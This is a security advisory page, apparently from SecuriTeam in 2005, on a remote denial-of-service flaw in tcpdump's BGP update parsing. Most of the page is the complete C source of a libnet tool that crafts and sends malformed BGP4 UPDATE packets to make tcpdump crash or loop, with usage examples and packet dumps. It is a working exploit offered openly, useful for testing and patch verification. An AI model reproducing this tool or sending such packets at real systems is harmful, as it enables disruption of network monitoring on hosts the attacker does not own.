Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	Tcpdump Remote Denial of Service Exploit (bgp_update_print) 9 Jun. 2005    Summary "tcpdump is a program used to dump network traffic for TCP/IP networks. The information can be used by a wide variety of network analysis programs, either via piping or by saving the stream to a file for later analysis." By sending a specially crafted BGP4 message to a server running tcpdump, it is possible to crash the target application.   Credit: The information has been provided by Fr d ric Raynal. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * libnet version 1.1. Exploit: /* * 2005-05-31: Modified by simon@FreeBSD.org to test tcpdump infinite * loop vulnerability. * * libnet 1.1 * Build a BGP4 update message with what you want as payload * * Copyright (c) 2003 Fr d ric Raynal <pappy at security-labs organization> * All rights reserved. * * Examples: * * empty BGP UPDATE message: * * # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 * libnet 1.1 packet shaping: BGP4 update + payload[raw] * Wrote 63 byte TCP packet; check the wire. * * 13:44:29.216135 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok] * 16843009:16843032(23) win 32767: BGP (ttl 64, id 242, len 63) * 0x0000 4500 003f 00f2 0000 4006 73c2 0101 0101 E..?....@.s..... * 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff.......... * 0x0020 5002 7fff b288 0000 0101 0101 0101 0101 P............... * 0x0030 0101 0101 0101 0101 0017 0200 0000 00 ............... * * * BGP UPDATE with Path Attributes and Unfeasible Routes Length * * # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -a `printf "\x01\x02\x03"` -A 3 -W 13 * libnet 1.1 packet shaping: BGP4 update + payload[raw] * Wrote 79 byte TCP packet; check the wire. * * 13:45:59.579901 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok] * 16843009:16843048(39) win 32767: BGP (ttl 64, id 242, len 79) * 0x0000 4500 004f 00f2 0000 4006 73b2 0101 0101 E..O....@.s..... * 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff.......... * 0x0020 5002 7fff 199b 0000 0101 0101 0101 0101 P............... * 0x0030 0101 0101 0101 0101 0027 0200 0d41 4141 .........'...AAA * 0x0040 4141 4141 4141 4141 4141 0003 0102 03 AAAAAAAAAA..... * * * BGP UPDATE with Reachability Information * * # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -I 7 * libnet 1.1 packet shaping: BGP4 update + payload[raw] * Wrote 70 byte TCP packet; check the wire. * * 13:49:02.829225 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok] * 16843009:16843039(30) win 32767: BGP (ttl 64, id 242, len 70) * 0x0000 4500 0046 00f2 0000 4006 73bb 0101 0101 E..F....@.s..... * 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff.......... * 0x0020 5002 7fff e86d 0000 0101 0101 0101 0101 P....m.......... * 0x0030 0101 0101 0101 0101 001e 0200 0000 0043 ...............C * 0x0040 4343 4343 4343 CCCCCC * * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * */ /* #if (HAVE_CONFIG_H) */ /* #include "../include/config.h" */ /* #endif */ /* #include "./libnet_test.h" */ #include <libnet.h> void usage(char *name); #define set_ptr_and_size(ptr, size, val, flag) \ if (size && !ptr) \ { \ ptr = (u_char *)malloc(size); \ if (!ptr) \ { \ printf("memory allocation failed (%u bytes requested)\n", size); \ goto bad; \ } \ memset(ptr, val, size); \ flag = 1; \ } \ \ if (ptr && !size) \ { \ size = strlen(ptr); \ } int main(int argc, char *argv[]) { int c; libnet_t *l; u_long src_ip, dst_ip, length; libnet_ptag_t t = 0; char errbuf[LIBNET_ERRBUF_SIZE]; int pp; u_char *payload = NULL; u_long payload_s = 0; u_char marker[LIBNET_BGP4_MARKER_SIZE]; u_short u_rt_l = 0; u_char *withdraw_rt = NULL; char flag_w = 0; u_short attr_l = 0; u_char *attr = NULL; char flag_a = 0; u_short info_l = 0; u_char *info = NULL; char flag_i = 0; printf("libnet 1.1 packet shaping: BGP4 update + payload[raw]\n"); /* * Initialize the library. Root priviledges are required. */ l = libnet_init( LIBNET_RAW4, /* injection type */ NULL, /* network interface */ errbuf); /* error buffer */ if (l == NULL) { fprintf(stderr, "libnet_init() failed: %s", errbuf); exit(EXIT_FAILURE); } src_ip = 0; dst_ip = 0; memset(marker, 0x1, LIBNET_BGP4_MARKER_SIZE); memset(marker, 0xff, LIBNET_BGP4_MARKER_SIZE); while ((c = getopt(argc, argv, "d:s:t:m:p:w:W:a:A:i:I:")) != EOF) { switch (c) { /* * We expect the input to be of the form `ip.ip.ip.ip.port`. We * point cp to the last dot of the IP address/port string and * then seperate them with a NULL byte. The optarg now points to * just the IP address, and cp points to the port. */ case 'd': if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 's': if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 'p': payload = optarg; payload_s = strlen(payload); break; case 'w': withdraw_rt = optarg; break; case 'W': u_rt_l = atoi(optarg); break; case 'a': attr = optarg; break; case 'A': attr_l = atoi(optarg); break; case 'i': info = optarg; break; case 'I': info_l = atoi(optarg); break; default: exit(EXIT_FAILURE); } } if (!src_ip || !dst_ip) { usage(argv[0]); goto bad; } set_ptr_and_size(withdraw_rt, u_rt_l, 0x41, flag_w); set_ptr_and_size(attr, attr_l, 0x42, flag_a); set_ptr_and_size(info, info_l, 0x43, flag_i); /* * 2005-05-31: Modified by simon@FreeBSD.org to test tcpdump * infinite loop vulnerability. */ if (payload == NULL) { if ((payload = malloc(16)) == NULL) { fprintf(stderr, "Out of memory\n"); exit(1); } pp = 0; payload[pp++] = 0; payload[pp++] = 33; payload_s = pp; } /* * BGP4 update messages are "dynamic" are fields have variable size. The only * sizes we know are those for the 2 first fields ... so we need to count them * plus their value. */ length = LIBNET_BGP4_UPDATE_H + u_rt_l + attr_l + info_l + payload_s; t = libnet_build_bgp4_update( u_rt_l, /* Unfeasible Routes Length */ withdraw_rt, /* Withdrawn Routes */ attr_l, /* Total Path Attribute Length */ attr, /* Path Attributes */ info_l, /* Network Layer Reachability Information length */ info, /* Network Layer Reachability Information */ payload, /* payload */ payload_s, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build BGP4 update header: %s\n", libnet_geterror(l)); goto bad; } length+=LIBNET_BGP4_HEADER_H; t = libnet_build_bgp4_header( marker, /* marker */ length, /* length */ LIBNET_BGP4_UPDATE, /* message type */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build BGP4 header: %s\n", libnet_geterror(l)); goto bad; } length+=LIBNET_TCP_H; t = libnet_build_tcp( 0x6666, /* source port */ 179, /* destination port */ 0x01010101, /* sequence number */ 0x02020202, /* acknowledgement num */ TH_SYN, /* control flags */ 32767, /* window size */ 0, /* checksum */ 0, /* urgent pointer */ length, /* TCP packet size */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l)); goto bad; } length+=LIBNET_IPV4_H; t = libnet_build_ipv4( length, /* length */ 0, /* TOS */ 242, /* IP ID */ 0, /* IP Frag */ 64, /* TTL */ IPPROTO_TCP, /* protocol */ 0, /* checksum */ src_ip, /* source IP */ dst_ip, /* destination IP */ NULL, /* payload */ 0, /* payload size */ l, /* libnet handle */ 0); /* libnet id */ if (t == -1) { fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); goto bad; } /* * Write it to the wire. */ c = libnet_write(l); if (c == -1) { fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); goto bad; } else { fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c); } if (flag_w) free(withdraw_rt); if (flag_a) free(attr); if (flag_i) free(info); libnet_destroy(l); return (EXIT_SUCCESS); bad: if (flag_w) free(withdraw_rt); if (flag_a) free(attr); if (flag_i) free(info); libnet_destroy(l); return (EXIT_FAILURE); } void usage(char *name) { fprintf(stderr, "usage: %s -s source_ip -d destination_ip \n" " [-m marker] [-p payload] [-S payload size]\n" " [-w Withdrawn Routes] [-W Unfeasible Routes Length]\n" " [-a Path Attributes] [-A Attribute Length]\n" " [-i Reachability Information] [-I Reachability Information length]\n", name); }  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS Exploit IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS Progea Movicon TCPUploadServer Remote Exploit Trango Broadband Wireless Rogue SU Authentication Bug Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow Family Connections Multiple Remote Vulnerabilities VideoCache vccleaner Root Vulnerability QuickHeal Antivirus 2010 Local Privilege Escalation DubSite CMS Cross Site Request Forgery Vulnerability SonicWall Global Management System XSS Vulnerability Sonicwall NSA E7500 XSS Vulnerability Juniper Security Threat Response Manager XSS Vulnerability Hacking CSRF Tokens using CSS History Hack Sun Java System Identiy Manager Users Enumeration Microsoft Internet Explorer XML Buffer Overflow (Exploit)  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®